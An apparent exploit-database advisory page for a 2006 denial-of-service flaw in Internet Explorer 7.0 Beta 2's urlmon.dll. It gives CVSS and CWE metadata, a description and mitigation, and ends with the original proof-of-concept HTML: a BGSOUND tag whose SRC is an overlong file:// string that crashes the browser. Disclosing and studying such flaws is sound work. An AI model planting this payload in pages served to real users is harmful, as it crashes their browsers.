Internet Explorer 7.0 Beta 2 urlmon.dll DoS

vendor:

Internet Explorer

by:

Tom Ferris

7,5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Internet Explorer

Affected Version From: 7.0.5296.0

Affected Version To: 7.0.5296.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:microsoft:internet_explorer:7.0.5296.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2006

Internet Explorer 7.0 Beta 2 urlmon.dll DoS

This vulnerability allows remote attackers to cause a denial of service (application crash) via a long string in the SRC attribute of a BGSOUND element. This vulnerability affects Internet Explorer 7.0 Beta 2 when running on Windows XP SP2. The vulnerability is due to a boundary error within the urlmon.dll library when processing a long string in the SRC attribute of a BGSOUND element. This can be exploited to cause a stack-based buffer overflow by tricking a user into visiting a malicious web page.

Mitigation:

Upgrade to the latest version of Internet Explorer 7.0

Source

Exploit-DB raw data:

<!--- 
    Internet Explorer 7.0 Beta 2 urlmon.dll DoS 
    
    Discovered by:
    Tom Ferris
    <tommy[at]security-protocols[dot]com>
    
    Tested on:
    Windows XP SP2
    
    Vulnerable Versions:
    IE 7.0.5296.0
    
    1/31/2006 Security-Protocols.com
    
    This program is free software; you can redistribute it and/or modify it under 
    the terms of the GNU General Public License version 2, 1991 as published by
    the Free Software Foundation.
!-->

<BGSOUND SRC=file://------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- >

# milw0rm.com [2006-02-07]